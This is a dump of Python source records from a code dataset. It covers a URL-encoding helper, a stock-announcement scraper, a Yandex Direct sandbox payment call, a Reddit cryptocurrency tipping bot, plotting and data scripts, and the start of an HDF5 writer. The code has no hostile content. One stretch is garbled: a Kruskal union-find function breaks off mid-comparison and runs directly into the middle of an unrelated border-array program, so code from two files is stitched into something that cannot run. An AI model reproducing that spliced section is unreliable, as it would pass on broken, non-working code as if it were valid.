'%3D','?': '%3F','@': '%40','\\\\': '%5C','_': '%5F'}\r\n\tprint(\"encode is\",encode)\r\n\tif encode:\r\n\r\n\t\tfor key, value in dencoding_dict.items():\r\n\t\t\tstring = string.replace(key,value)\r\n\telse:\r\n\t\tfor key, value in dencoding_dict.items():\r\n\t\t\tstring = string.replace(value,key)\r\n\treturn string\r\n\r\n\r\nreturned_string = dencoding('!\"#$&*+-/:=?@\\_')\r\nprint(returned_string)\r\nprint('%21%22%23%24%26%2A%2B%2D%2F%3A%3D%3F%40%5C%5F')\r\nreturned_string = dencoding('%21%22%23%24%26%2A%2B%2D%2F%3A%3D%3F%40%5C%5F',False)\r\nprint(returned_string)\r\nprint('!\"#$&*+-/:=?@\\_')","sub_path":"dencoding.py","file_name":"dencoding.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"577184610","text":"import datetime\nimport functools\nimport logging\nimport os\nimport random\nimport re\nimport sys\nimport time\nimport pprint\nimport traceback\n\nfrom retrying import retry\n\ncur_path = os.path.split(os.path.realpath(__file__))[0]\nfile_path = os.path.abspath(os.path.join(cur_path, \"..\"))\nsys.path.insert(0, file_path)\nfrom announcement.juchao_historyant_base import JuchaoHisSpiderBase\n\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nlogger = logging.getLogger(__name__)\n\n\nclass JuchaoHistorySpider(JuchaoHisSpiderBase):\n \"\"\"巨潮历史公告爬虫 \"\"\"\n def __init__(self):\n super(JuchaoHistorySpider, self).__init__()\n self.partten = re.compile('\\<.*\\>')\n self.table_name = 'spy_announcement_data'\n self.fields = ['secu_id', 'category_code', 'title', 'pub_date']\n\n @functools.cached_property\n def category_code_map(self):\n return {\n 'category_bcgz_szsh': ('补充更正', 19),\n 'category_bndbg_szsh': ('半年报', 2),\n 'category_cqdq_szsh': ('澄清致歉', 12),\n 'category_dshgg_szsh': ('董事会', 18),\n 'category_fxts_szsh': ('风险提示', 21),\n 'category_gddh_szsh': ('股东大会', 15),\n 'category_gqbd_szsh': ('股权变动', 16),\n 'category_gqjl_szsh': ('股权激励', 17),\n 'category_gszl_szsh': ('公司治理', 24),\n 'category_gszq_szsh': ('公司债', 25),\n 'category_jj_szsh': ('解禁', 9),\n 'category_jshgg_szsh': ('监事会', 14),\n 'category_kzzq_szsh': ('可转债', 22),\n 'category_ndbg_szsh': ('年报', 4),\n 'category_pg_szsh': ('配股', 7),\n 'category_qtrz_szsh': ('其他融资', 23),\n 'category_qyfpxzcs_szsh': ('权益分派', 11),\n 'category_rcjy_szsh': ('日常经营', 10),\n 'category_sf_szsh': ('首发', 8),\n 'category_sjdbg_szsh': ('三季报', 3),\n 'category_tbclts_szsh': ('特别处理和退市', 13),\n 'category_tszlq_szsh': ('退市整理期', 20),\n 'category_yjdbg_szsh': ('一季报', 1),\n 'category_yjygjxz_szsh': ('业绩预告', 5),\n 'category_zf_szsh': ('增发', 6),\n 'category_zj_szsh': ('中介报告', 26),\n 'category_others': ('其他', 27),\n }\n\n @functools.cached_property\n def secu_id_map(self):\n print(\"* \" * 1000)\n sql = '''select * from bas_secumain where secu_type = 1 ; '''\n secu_id_map = {}\n ret = self._spider_conn.query(sql)\n for r in ret:\n secu_id_map[r['secu_code'][2:]] = r['id']\n return secu_id_map\n\n def process_items(self, ants: list, info: dict):\n items = []\n for ant in ants:\n item = dict()\n try:\n category_code = self.category_code_map.get(info.get(\"cat_code\"))[1]\n except:\n raise ValueError(f\"出现未知分类{info.get('cat_code')}\")\n item['category_code'] = category_code\n secu_code = ant.get('secCode')\n secu_id = self.secu_id_map.get(secu_code)\n if secu_id is None:\n logger.warning(f'{secu_code} 不是 A 股 ')\n continue\n item['secu_id'] = secu_id\n item['title'] = ant.get(\"announcementTitle\")\n item.update({'pdf_link': 'http://static.cninfo.com.cn/' + ant.get(\"adjunctUrl\")})\n time_stamp = ant.get(\"announcementTime\") / 1000\n item.update({'pub_date': datetime.datetime.fromtimestamp(time_stamp)})\n print(item)\n items.append(item)\n return items\n\n @retry(stop_max_attempt_number=3)\n def query_unconditional(self,\n stock_str: str = '',\n start_date: datetime.datetime = None,\n end_date: datetime.datetime = None,\n ):\n counts = 0\n if not start_date and not end_date:\n se_date = ''\n else:\n se_date = \"{}~{}\".format(start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\"))\n\n for page in range(1, 100):\n ants = self._query(stock_str=stock_str, se_date=se_date, cat_code='', page=page, search_key='')\n if len(ants) == 0:\n break\n items = self.process_items(ants, {'cat_code': 'category_others', 'cat_name': '其他'})\n counts += len(items)\n self._spider_conn.batch_insert(items, self.table_name, ['secu_id', 'title', 'pub_date'])\n logger.info(f\"无分类查询: 本次股票{stock_str}, 本次时间{start_date}-->>{end_date}, 数量: {counts}\")\n\n @retry(stop_max_attempt_number=3)\n def query(self,\n stock_str: str = '',\n start_date: datetime.datetime = None,\n end_date: datetime.datetime = None,\n ):\n counts = 0\n count_map = {}\n for cat_code, cat_name in self.ant_types.items():\n cat_num = 0\n time.sleep(random.randint(1, 3)/10)\n if not start_date and not end_date:\n se_date = ''\n else:\n se_date = \"{}~{}\".format(start_date.strftime(\"%Y-%m-%d\"), end_date.strftime(\"%Y-%m-%d\"))\n\n for page in range(1, 100):\n ants = self._query(stock_str=stock_str, se_date=se_date, cat_code=cat_code, page=page, search_key='')\n if len(ants) == 0:\n break\n items = self.process_items(ants, {'cat_code': cat_code, 'cat_name': cat_name})\n self._spider_conn.batch_insert(items, self.table_name, self.fields) # ['secu_id', 'category_code', 'title', 'pub_date']\n cat_num += len(items)\n\n count_map[cat_name] = cat_num\n counts += cat_num\n logger.info(f\"本次股票: {stock_str}, 本次时间: {start_date}-->>{end_date}, 总数量: {counts}\\n, \"\n f\"分类明细: {pprint.pformat(count_map)}\")\n\n def start(self, start_dt: datetime.datetime = None, end_dt: datetime.datetime = None):\n _today = datetime.datetime.combine(datetime.datetime.today(), datetime.time.min)\n\n if not start_dt:\n start_dt = _today\n if not end_dt:\n end_dt = _today\n\n self.query(start_date=start_dt, end_date=end_dt)\n self.query_unconditional(start_date=start_dt, end_date=end_dt)\n\n\nif __name__ == '__main__':\n def task():\n try:\n JuchaoHistorySpider().start()\n except:\n traceback.print_exc()\n task()\n","sub_path":"bas_secumain/base_spy.py","file_name":"base_spy.py","file_ext":"py","file_size_in_byte":6585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"353968745","text":"#신장트리\n#크루스칼알고리즘(최소비용 신장트리)\n\n\n#특정 원소가 속한 집합을 찾기\n\ndef find_parent(parent,x):\n #루트 노드가 아니라면 루트 노드를 찾을때까지 재귀적으로 호출\n if parent[x] != x:\n parent[x] = find_parent(parent,parent[x])\n return parent[x]\n\ndef union_parent(parent,a,b):\n a = find_parent(parent,a)\n b = find_parent(parent,b)\n\n if a L: break\r\n if level == 1:\r\n if x > 0:\r\n print(\"+++ \",end='')\r\n else:\r\n print(\"... \",end='')\r\n else:\r\n if x < level:\r\n print(\" \",end='')\r\n else:\r\n print(\"+++ \",end='')\r\n #end for\r\n print(\"\")\r\n#end display_line\r\n\r\n\r\ndef fancy_display(bordar,L):\r\n for level in range(L,0,-1):\r\n display_line(bordar,level,L)\r\n #end for\r\n#end fancy_display\r\n \r\n\r\ndef main():\r\n if len(argv) != 2:\r\n print(\"incorrect number of command line argumemts\")\r\n exit(0)\r\n string = argv[1]\r\n L = len(string)\r\n if L > 12:\r\n print(\"imput string too long\")\r\n return\r\n else:\r\n print(\"imput string: \",end='')\r\n print(string)\r\n bordar=[0,0,0,0,0,0,0,0,0,0,0,0] # \"empty\" array of size 12\r\n L1=L\r\n for i in range(L-1):\r\n bordar[i] = maxbord(string[i:],L1)\r\n L1 = L1-1\r\n #end for\r\n simple_display(bordar,L)\r\n fancy_display(bordar,L)\r\n#end main\r\n\r\nmain()\r\n","sub_path":"fproj.py","file_name":"fproj.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"11493221","text":"import json\nimport tokens\nimport hashlib\nfrom urllib.request import urlopen\n\nurl = 'https://api-sandbox.direct.yandex.com/v4/json/'\n\noperationNum = 121\nusedMethod = 'PayCampaigns'\n\nfinanceToken = hashlib.sha256((tokens.masterToken + str(operationNum) +\n usedMethod +\n tokens.login).encode('utf8')).hexdigest()\n\ndata = {\n 'method': 'PayCampaigns',\n 'token': tokens.token,\n 'finance_token': financeToken,\n 'operation_num': operationNum,\n 'locale': 'ru',\n 'param': {\n 'Payments': [{\n 'CampaignID': (258015),\n 'Sum': (150000.0)\n }],\n \"ContractID\": ('11111/00'),\n \"PayMethod\": ('Bank')\n }\n}\n\n\n# Кодирование тела запроса в JSON\njdata = json.dumps(data, ensure_ascii=False).encode('utf8')\n\nresponse = urlopen(url, jdata)\n\n# вывести результат\nprint(response.read().decode('utf8'))\n","sub_path":"4_pay_campaign.py","file_name":"4_pay_campaign.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"591899257","text":"input = open('input.txt','r').readline\n\n# input \nn = int(input())\na= list(map(int, input().split()))\n\n# DP list & initial value\ndp = [0] * (n+4)\ndp[0] = 0\n\n# DP\nfor i in range(n):\n dp[i+1] = max(dp[i], dp[i] + a[i])\n\n# Ans\nprint(dp[n])","sub_path":"121---Atcorder/DP/t1-total-/total.py","file_name":"total.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368826286","text":"import pandas as pd\nimport geopandas as gpd\nfrom shapely.geometry import Point, Polygon\nimport matplotlib.pyplot as plt\n\nxlOrders = pd.ExcelFile(r'./resources/output/orderIn60Miles.xlsx')\nxlPolys = pd.ExcelFile(r'./resources/output/polygons.xlsx')\nxlPercents = pd.ExcelFile(r'./resources/output/polyIn60MilesPercent.xlsx')\n\n# import street map\nstreet_map = gpd.read_file('./resources/tl_2018_us_necta/tl_2018_us_necta.shp')\n# designate coordinate system\ncrs = {'init': 'EPSG:4326'}\n\nindex = 0\ndfPercents = xlPercents.parse(\"Percentage\")\nfor city in dfPercents[\"City\"]:\n print(city)\n if city == \"Boston\" or city == \"US Total\":\n continue\n dfOrders = xlOrders.parse(city)\n dfPolys = xlPolys.parse(city)\n\n dfOrdersInside = xlPercents.parse(city + \" Inside Orders\")\n dfOrdersBoundary = xlPercents.parse(city + \" Boundary Orders\")\n\n # zip x and y coordinates into single feature\n geometryOrders = [Point(x, y) for x, y in zip(dfOrders['Lng'], dfOrders['Lat'])]\n # geometryPolys = [Point(x, y) for x, y in zip(dfPolys['Lng'], dfPolys['Lat'])]\n geometryPolys = [Point(x, y) for x, y in zip(dfOrdersBoundary['Lng'], dfOrdersBoundary['Lat'])]\n\n # create GeoPandas dataframe\n geoDfOrders = gpd.GeoDataFrame(dfOrders, crs=crs, geometry=geometryOrders)\n\n geoDfPolys = gpd.GeoDataFrame(dfOrdersBoundary, crs=crs, geometry=geometryPolys)\n polygon = Polygon(geoDfPolys['geometry'].tolist())\n geoDfPolys = gpd.GeoDataFrame(geometry=[polygon], crs=crs)\n\n geoDfPolysArea = geoDfPolys.copy()\n geoDfPolysArea = geoDfPolysArea.to_crs({'init': 'epsg:32633'})\n geoDfPolysArea[\"area\"] = geoDfPolysArea['geometry'].area / 10 ** 6 # km2\n orderDensity = len(dfOrdersInside) / geoDfPolysArea[\"area\"][0]\n # print(orderDensity)\n\n # create figure and axes, assign to subplot\n fig, ax = plt.subplots(figsize=(15, 15))\n\n # add .shp mapfile to axes\n street_map.plot(ax=ax, alpha=0.4, color='grey')\n\n # add geodataframe to axes\n geoDfPolys.boundary.plot(color=None, edgecolor='k', ax=ax)\n geoDfOrders.plot(column='Distance', ax=ax, alpha=0.5, legend=True, markersize=4)\n # geoDfOrders.plot(ax=ax, alpha=0.5, legend=True, markersize=4)\n\n # add title to graph\n plt.title(city + \" (\" + dfPercents[\"Percentage\"][index] + \" inside, \" +\n \"{:.2f}\".format(orderDensity) + \" orders/km2, Total Area: \" +\n \"{:.2f}\".format(geoDfPolysArea[\"area\"][0]) + \"km2)\",\n fontsize=15, fontweight='bold')\n\n # set latitiude and longitude boundaries for map display\n xMin = min(geoDfOrders['Lng'])\n xMax = max(geoDfOrders['Lng'])\n\n yMin = min(geoDfOrders['Lat'])\n yMax = max(geoDfOrders['Lat'])\n\n plt.xlim(xMin, xMax)\n plt.ylim(yMin, yMax)\n # show map\n # plt.show()\n plt.savefig(\"./resources/output/figures/\" + city + \".png\")\n index += 1\n\n","sub_path":"map-handler.py","file_name":"map-handler.py","file_ext":"py","file_size_in_byte":2847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"293600404","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#demonstrations = [\"a\", \"b\", \"c\"]\n#demonstrations = [\"_a\", \"_b\", \"_c\"]\ndemonstrations = [\"a\"]\n#demonstrations = [\"_a\"]\n#demonstrations = [\"a_filtered\"]\n\nfolderName = \"error_weighted\"\n#folderName = \"min_error\"\n\nwith open(\"../../src/sampling/turbulence/scale_data_turbulence_density.txt\", \"r\") as inFile:\n allLines = inFile.readlines()\n maxValueDensity = eval(allLines[0])[-1]\n minValueDensity = eval(allLines[1])[-1]\n\nfor index, item in enumerate(demonstrations):\n allPointsX = []\n allPointsY = []\n\n # scatter\n \n plt.figure()\n with open(folderName + \"/suggested_slps_\" + item + \".txt\", \"r\") as inFile:\n for line in inFile:\n point = eval(line)[0]\n\n # scale\n #point = tuple([(point[0]-minValueDensity)/(maxValueDensity-minValueDensity)])\n\n plt.scatter(point[0], point[0], c=\"b\", marker=\"o\", alpha=0.3)\n allPointsX.append(point[0])\n allPointsY.append(point[0])\n \n plt.scatter(point[0], point[0], c=\"b\", marker=\"o\", alpha=0.3, label=\"Suggested SLPs\")\n\n with open(\"demonstration_slps.txt\", \"r\") as inFile:\n point = eval(inFile.readlines()[index])\n\n # scale\n #point = tuple([(point[0]-minValueDensity)/(maxValueDensity-minValueDensity)])\n \n plt.scatter(point[0], point[0], c=\"r\", marker=\"s\", alpha=1.0, label=\"Demonstration SLPs\")\n\n plt.scatter(np.mean(allPointsX), np.mean(allPointsY), c=\"g\", marker=\"s\", alpha=1.0, label=\"Mean SLPs\")\n plt.xlabel(\"Density\")\n plt.ylabel(\"Density\")\n plt.legend()\n plt.savefig(folderName + \"/suggested_slps_\" + item)\n\n # histogram\n \n plt.figure()\n plt.hist(allPointsX, bins=50, range=(0,50))\n plt.xlabel(\"Density\")\n plt.ylabel(\"Number of Points\")\n plt.gca().set_ylim([0,100])\n plt.savefig(folderName + \"/histogram_suggested_slps_\" + item)\n","sub_path":"snippets/turbulence/plot_suggested_slps.py","file_name":"plot_suggested_slps.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"506193962","text":"import supereeg as se\nimport numpy as np\nimport glob\nimport sys\nimport os\nfrom config import config\n\n\n\nmodel_template = sys.argv[1]\n\nradius = sys.argv[2]\n\nvox_size = sys.argv[3]\n\nif model_template == 'pyFR_union':\n model_dir = os.path.join(config['datadir'], model_template +\"_\" + vox_size)\n\nelse:\n model_dir = os.path.join(config['datadir'], model_template + \"_\" + vox_size)\n\nresults_dir = os.path.join(config['resultsdir'], model_template +\"_\"+ vox_size)\n\ntry:\n if not os.path.exists(results_dir):\n os.makedirs(results_dir)\nexcept OSError as err:\n print(err)\n\nmos =glob.glob(os.path.join(model_dir, '*.mo'))\n\nmo = se.Model(mos, n_subs=len(mos))\n\nmo.save(os.path.join(results_dir, 'ave_mat'))","sub_path":"code/scripts/ave_mats/ave_mats.py","file_name":"ave_mats.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"493442547","text":"import random\nimport re\n\nfrom jinja2 import Template\nfrom praw.models import Comment, Message\n\nimport bot_logger\nimport config\nimport crypto\nimport history\nimport lang\nimport models\nimport user_function\nimport utils\n\n\ndef register_user(msg, reddit):\n rpc = crypto.get_rpc()\n\n user = models.User(msg.author.name)\n if not user.is_registered():\n user.get_new_address()\n if user.address:\n content_reply = Template(lang.message_register_success + lang.message_footer).render(\n username=user.username,\n address=user.address)\n tittle_reply = 'you are registered'\n\n user_function.add_user(msg.author.name, user.address)\n\n history.add_to_history(msg.author.name, \"\", \"\", \"\", \"register\")\n\n # create a backup of wallet\n crypto.backup_wallet()\n else:\n bot_logger.logger.warning('Error during register !')\n else:\n bot_logger.logger.info('%s are already registered ' % msg.author.name)\n\n balance = user.get_balance_confirmed()\n pending_balance = user.get_balance_unconfirmed()\n spendable_balance = crypto.get_user_spendable_balance(msg.author.name) + balance\n pending_value_usd = utils.get_coin_value(pending_balance)\n spendable_value_usd = utils.get_coin_value(spendable_balance)\n content_reply = Template(\n lang.message_already_registered + lang.message_account_details + lang.message_footer).render(\n username=msg.author.name,\n address=user.address,\n pending_balance=str(pending_balance),\n pending_value_usd=str(pending_value_usd),\n spendable_balance=str(spendable_balance),\n spendable_value_usd=str(spendable_value_usd)\n )\n tittle_reply = 'you are already registered'\n\n # send PM so just reply\n if type(msg) is Message:\n msg.reply(content_reply)\n\n # we have just comment so send info in PM\n if type(msg) is Comment:\n reddit.redditor(msg.author.name).message(tittle_reply, content_reply)\n\n\ndef info_user(msg):\n rpc = crypto.get_rpc()\n\n user = models.User(msg.author.name)\n if user.is_registered():\n balance = user.get_balance_confirmed()\n\n # pending_tips is balance of tip send to unregistered users\n pending_tips = user.get_balance_unregistered_tip()\n\n pending_balance = user.get_balance_unconfirmed()\n spendable_balance = crypto.get_user_spendable_balance(msg.author.name) + balance\n\n bot_logger.logger.info('user %s balance = %s' % (msg.author.name, balance))\n bot_logger.logger.info('user %s spendable_balance = %s' % (msg.author.name, spendable_balance))\n\n pending_value_usd = utils.get_coin_value(pending_balance)\n spendable_value_usd = utils.get_coin_value(spendable_balance)\n pending_tips_value_usd = utils.get_coin_value(pending_tips)\n\n msg.reply(Template(lang.message_account_details + lang.message_footer).render(\n username=msg.author.name,\n spendable_balance=str(spendable_balance),\n spendable_value_usd=str(spendable_value_usd),\n pending_balance=str(pending_balance),\n pending_value_usd=str(pending_value_usd),\n pending_tips=str(pending_tips),\n pending_tips_value_usd=str(pending_tips_value_usd),\n address=user.address))\n\n history.add_to_history(msg.author.name, \"\", \"\", spendable_balance, \"info\")\n else:\n bot_logger.logger.info('user %s not registered (command : info) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef help_user(msg):\n user = models.User(msg.author.name)\n if user.is_registered():\n msg.reply(Template(lang.message_help + lang.message_footer).render(\n username=msg.author.name, address=user.address))\n else:\n bot_logger.logger.info('user %s not registered (command : help) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef withdraw_user(msg, failover_time):\n split_message = msg.body.strip().split()\n\n user = models.User(msg.author.name)\n if user.is_registered():\n\n if utils.check_amount_valid(split_message[1]) and split_message[4] != user.address:\n amount = float(split_message[1])\n amount = round(amount - 0.5)\n\n user_balance = user.get_balance_confirmed()\n user_spendable_balance = crypto.get_user_spendable_balance(user.username)\n\n if amount >= float(user_balance) + float(user_spendable_balance):\n bot_logger.logger.info('user %s not have enough to withdraw this amount (%s), balance = %s' % (\n user.username, amount, user_balance))\n msg.reply(Template(lang.message_balance_low_withdraw).render(\n username=user.username, user_balance=str(user_balance), amount=str(amount)) + lang.message_footer)\n else:\n receiver_address = split_message[4]\n tip_id = random.randint(0, 99999999)\n\n history.add_to_history(user.username, user.username, receiver_address, amount, \"withdraw\", \"\", tip_id)\n\n send = crypto.tip_user(user.address, receiver_address, amount, None, failover_time)\n\n if send:\n history.update_withdraw(user.username, True, send, tip_id)\n\n value_usd = utils.get_coin_value(amount)\n msg.reply(Template(lang.message_withdraw + lang.message_footer).render(\n username=user.username, receiver_address=receiver_address, amount=str(amount),\n value_usd=str(value_usd)))\n\n elif split_message[4] == user.address:\n msg.reply(lang.message_withdraw_to_self + lang.message_footer)\n else:\n bot_logger.logger.info(lang.message_invalid_amount)\n msg.reply(lang.message_invalid_amount + lang.message_footer)\n else:\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\ndef tip_user(reddit, msg, tx_queue, failover_time):\n bot_logger.logger.info('An user mention detected ')\n bot_logger.logger.debug(\"failover_time : %s \" % (str(failover_time.value)))\n\n # create an Tip\n tip = models.Tip()\n\n # update sender\n tip.set_sender(msg.author.name)\n\n # check user who use command is registered\n if tip.sender.is_registered() is not True:\n bot_logger.logger.info('user %s not registered (sender) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n return False\n\n # parse message\n tip.parse_message(msg.body)\n\n # set reddit message id\n tip.message_fullname = msg.fullname\n\n # check amount of tip\n if not utils.check_amount_valid(tip.amount):\n # invalid amount\n bot_logger.logger.info(lang.message_invalid_amount)\n reddit.redditor(msg.author.name).message('invalid amount', lang.message_invalid_amount)\n return False\n\n if tip.currency is None:\n bot_logger.logger.info(lang.message_invalid_currency)\n reddit.redditor(msg.author.name).message('invalid currency', lang.message_invalid_currency)\n return False\n\n # update receiver\n tip.set_receiver(msg.parent().author.name)\n\n # check user not tip self\n if tip.sender.username == tip.receiver.username:\n reddit.redditor(tip.sender.username).message('cannot tip self',\n Template(lang.message_recipient_self).render(\n username=tip.sender.username))\n return False\n\n # check we have enough\n user_spendable_balance = crypto.balance_user(msg, failover_time)\n bot_logger.logger.debug('user_spendable_balance = %s' % user_spendable_balance)\n\n # in failover we need to use only user_balance\n if tip.amount >= float(user_spendable_balance):\n user_pending_balance = tip.sender.get_balance_unconfirmed()\n # not enough for tip\n if tip.amount < float(user_pending_balance):\n reddit.redditor(tip.sender.username).message('pending tip',\n Template(lang.message_balance_pending_tip).render(\n username=tip.sender.username))\n else:\n bot_logger.logger.info('user %s not have enough to tip this amount (%s), balance = %s' % (\n tip.sender.username, str(tip.amount), str(user_spendable_balance)))\n reddit.redditor(tip.sender.username).message('low balance',\n Template(lang.message_balance_low_tip).render(\n username=tip.sender.username))\n\n else:\n # add tip to history of sender & receiver\n history.add_to_history_tip(tip.sender.username, \"tip send\", tip)\n history.add_to_history_tip(tip.receiver.username, \"tip receive\", tip)\n\n # check user who receive tip have an account\n if tip.receiver.is_registered():\n tip.tx_id = crypto.tip_user(tip.sender.address, tip.receiver.address, tip.amount, tx_queue,\n failover_time)\n if tip.tx_id:\n tip.finish = True\n tip.status = 'ok'\n\n bot_logger.logger.info(\n '%s tip %s to %s' % (msg.author.name, str(tip.amount), tip.receiver.username))\n\n # if user have 'verify' in this command he will have confirmation\n if tip.verify:\n msg.reply(Template(lang.message_tip).render(\n sender=msg.author.name, receiver=tip.receiver.username,\n amount=str(int(tip.amount)),\n value_usd=str(tip.get_value_usd()), txid=tip.tx_id\n ))\n else:\n bot_logger.logger.info('user %s not registered (receiver)' % tip.receiver.username)\n tip.status = \"waiting registration of receiver\"\n\n # save tip\n user_function.save_unregistered_tip(tip)\n\n # send message to sender of tip\n reddit.redditor(tip.sender.username).message('tipped user not registered',\n Template(lang.message_recipient_register).render(\n username=tip.receiver.username))\n # send message to receiver\n reddit.redditor(tip.receiver.username).message(\n Template(\n lang.message_recipient_need_register_title).render(amount=str(tip.amount)),\n Template(\n lang.message_recipient_need_register_message).render(\n username=tip.receiver.username, sender=msg.author.name, amount=str(tip.amount),\n value_usd=str(tip.get_value_usd())))\n\n # update tip status\n history.update_tip(tip.sender.username, tip)\n history.update_tip(tip.receiver.username, tip)\n\n\ndef history_user(msg):\n user = models.User(msg.author.name)\n if user.is_registered():\n # get user history\n data_raw = history.get_user_history(user.username)\n # keep only 30 last entry\n data = data_raw[-30:]\n\n history_table = history.build_message(data)\n\n msg.reply(Template(lang.message_history + history_table + lang.message_footer).render(username=msg.author.name))\n else:\n bot_logger.logger.info('user %s not registered (command : history) ' % msg.author.name)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=msg.author.name))\n\n\n# Resend tips to previously unregistered users that are now registered\ndef replay_remove_pending_tip(reddit, tx_queue, failover_time):\n # check if user have pending tips\n list_tips = user_function.get_unregistered_tip()\n\n if list_tips:\n for arr_tip in list_tips:\n tip = models.Tip().create_from_array(arr_tip)\n\n bot_logger.logger.info(\"replay tipping check for %s\" % str(tip.id))\n\n # check if it's not too old & replay tipping\n if not tip.is_expired():\n if tip.receiver.is_registered():\n bot_logger.logger.info(\n \"replay tipping %s - %s send %s to %s \" % (\n str(tip.id), tip.sender.username, tip.amount, tip.receiver.username))\n\n tip.tx_id = crypto.tip_user(tip.sender.address, tip.receiver.address, tip.amount, tx_queue,\n failover_time)\n if tip.tx_id:\n tip.finish = True\n\n user_function.remove_pending_tip(tip.id)\n\n if tip.message_fullname is not None:\n msg_id = re.sub(r't\\d+_(?P\\w+)', r'\\g', tip.message_fullname)\n msg = Comment(reddit, msg_id)\n msg.reply(Template(lang.message_tip).render(\n sender=tip.sender.username, receiver=tip.receiver.username, amount=str(tip.amount),\n value_usd=str(tip.get_value_usd()), txid=tip.tx_id))\n\n else:\n tip.status = \"waiting registration of receiver\"\n bot_logger.logger.info(\n \"replay check for %s - user %s not registered \" % (str(tip.id), tip.receiver.username))\n\n else:\n tip.status = \"receiver not registered in time\"\n tip.finish = \"\"\n bot_logger.logger.info(\n \"delete old tipping - %s send %s to %s \" % (\n tip.sender.username, tip.amount, tip.receiver.username))\n user_function.remove_pending_tip(tip.id)\n\n # update tip status\n history.update_tip(tip.sender.username, tip)\n history.update_tip(tip.receiver.username, tip)\n else:\n bot_logger.logger.info(\"no pending tipping\")\n\n\ndef donate(reddit, msg, tx_queue, failover_time):\n user = models.User(msg.author.name)\n if user.is_registered():\n split_message = msg.body.lower().strip().split()\n\n donate_index = split_message.index('+donate')\n amount = split_message[donate_index + 1]\n if utils.check_amount_valid(amount) and split_message[donate_index + 2] == 'maga':\n\n crypto.tip_user(user.username.address, models.User(config.bot_name).address, amount, tx_queue,\n failover_time)\n\n history.add_to_history(msg.author.name, msg.author.name, config.bot_name, amount, \"donate\")\n else:\n bot_logger.logger.info(lang.message_invalid_amount)\n reddit.redditor(user.username).message('invalid amount', lang.message_invalid_amount)\n else:\n bot_logger.logger.info('user %s not registered (command : donate) ' % user.username)\n msg.reply(Template(lang.message_need_register + lang.message_footer).render(username=user.username))\n\n","sub_path":"bot_command.py","file_name":"bot_command.py","file_ext":"py","file_size_in_byte":15402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525509470","text":"import enum\nimport numpy as np\nimport os\nfrom tqdm import tqdm\nimport pandas as pd\nimport re\n\nTool = enum.Enum(\"Tool\", \"Nabe Flypan Suihanki NotFound\")\n\ndef get_tool(text):\n if \"鍋\" in text:\n return Tool.Nabe\n if \"フライパン\" in text:\n return Tool.Flypan\n if \"炊飯器\" in text:\n return Tool.Suihanki\n return Tool.NotFound\n\ndef isUseStove(tool):\n if tool == Tool.Nabe or tool == Tool.Flypan:\n return True\n return False\n\ndef isLeavable(tool):\n if tool == Tool.Suihanki or tool == Tool.Nabe:\n return True\n return False\n\ndef get_duration(text):\n pattern = u'\\d+分'\n match = re.search(pattern, text)\n if match == None:\n return 0\n return int(text[match.start():match.end()-1])\n\ndef make_table(path):\n dirpath = path[:-4]\n df_w = pd.DataFrame(index=[], columns=['stepNo', 'text', 'useStove', 'leavable', 'duration', 'start', 'end'])\n df_r = pd.read_csv('data/'+dirpath+'.csv')\n play = -1\n step = 0\n before_text = \"\"\n for i, v in df_r.iterrows():\n if v['state']*play == 1:\n continue\n if v['state'] == 1:\n text = v['text']\n if text[:5] == before_text[:5]:\n continue\n if v['time'] <= 3.0:\n continue\n before_text = text\n tool = get_tool(text)\n series = pd.Series([step, text, isUseStove(tool), isLeavable(tool),\n get_duration(text), v['time'], 0], index=df_w.columns)\n play = 1\n continue\n if v['state'] == -1:\n series['end'] = v['time']\n play = -1\n step += 1\n df_w = df_w.append(series, ignore_index=True)\n tebledir = \"table\"\n if not os.path.isdir(tebledir):\n os.makedirs(tebledir)\n df_w.to_csv(tebledir+\"/\"+dirpath+\".csv\")\n\nif __name__ == \"__main__\":\n files = os.listdir('data/')\n for file in tqdm(files):\n make_table(file)\n","sub_path":"src/movie_processing/make_table.py","file_name":"make_table.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"279724848","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# © 2017-2019, ETH Zurich, Institut für Theoretische Physik\n# Author: Dominik Gresch \n\nfrom __future__ import division, print_function, unicode_literals\n\nimport h5py\nimport numpy as np\n\nfrom aiida.plugins import DataFactory\n\n\ndef write_kpoints(kpoints_data, *args, **kwargs):\n \"\"\"\n Write a 'KpointsData' instance to a file or file-like object in bands_inspect HDF5 format. Except for ``kpoints_data``, all positional\n and keyword arguments are passed to :class:`h5py.File`.\n \"\"\"\n # This can be replaced with bands_inspect.io functions when\n # AiiDA supports Python 3.\n with h5py.File(*args, **kwargs) as f:\n _serialize_kpoints(kpoints_data, f)\n\n\ndef _serialize_kpoints(kpoints_data, hdf5_handle):\n attrs = 